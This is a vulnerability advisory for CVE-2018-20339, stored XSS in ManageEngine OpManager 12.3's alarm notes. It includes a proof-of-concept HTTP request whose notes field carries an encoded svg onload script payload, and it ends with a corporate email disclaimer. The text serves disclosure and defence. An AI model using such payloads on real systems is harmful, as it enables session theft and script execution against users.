I. VULNERABILITY ------------------------- Zoho ManageEngine OpManager 12.3 before build 123239 allows XSS in the Notes column of the Alarms section II. CVE REFERENCE ------------------------- CVE-2018-20339 III. VENDOR ------------------------- https://www.manageengine.com IV. TIMELINE ------------------------- 20/11/18 Vulnerability discovered 20/11/18 Vendor contacted 20/12/2018 OPManager replay that they fixed V. CREDIT ------------------------- Murat Aydemir from Biznet Bilisim A.S. VI. DESCRIPTION ------------------------- ManageEngine OPManager product(version 12.3) was vulnerable to stored xss attacks. A successfully exploit of this attack could allow thief users sessions or arbitrary interpret javascript code on remote host. References: https://www.manageengine.com/network-monitoring/help/read-me.html, https://bugbounty.zoho.com/bb/info#hof VII. PoC ------------------------- POST /api/json/alarm/addNotes?apiKey=5f5e26abc7bf2af2a5669cf258ec8385&isFluidic=true HTTP/1.1 Host: vulnerablehost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://vulnerablehost/apiclient/ember/index.jsp Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 113 Cookie: JSESSIONID=DF47AA5596862216FF9BBBAE234975C1; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; opmcsrfcookie=5bb7df90-d1a4-4942-ae64-e5308fb5d501; f2RedirectUrl=http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FAlarms%2FAlarm%2FDetails%2Fkkkkk_192.168.252.150_URL_Poll; NFA__SSO=57D7F0938B20457F49BB1791E756CAC3 DNT: 1 Connection: close notes=aabbcc%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_notes_parameter')%2F%2F&entity=kkkkk_192.168.252.150_URL_Poll -- Bu mesaj ve ekleri, mesajda gönderildiği belirtilen kişi/kişilere özeldir ve gizlidir. Bu mesaj herhangi bir amaç için çoğaltılamaz, dağıtılamaz ve yayınlanamaz. Mesajın gönderildiği kişi değilseniz, mesaj içeriğini ya da eklerini kopyalamayınız, yayınlamayınız ya da başka kişilere yönlendirmeyiniz ve mesajı gönderen kişiyi derhal uyararak bu mesajı siliniz. Şirketimiz, mesajın içeriğinin ve eklerinin size değişikliğe uğrayarak veya geç ulaşmasından; gizliliğinin korunmamasından; virüs içermesinden ve bilgisayar sisteminize verebileceği herhangi bir zarardan sorumlu değildir This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in anyway to your computer system based on this message.
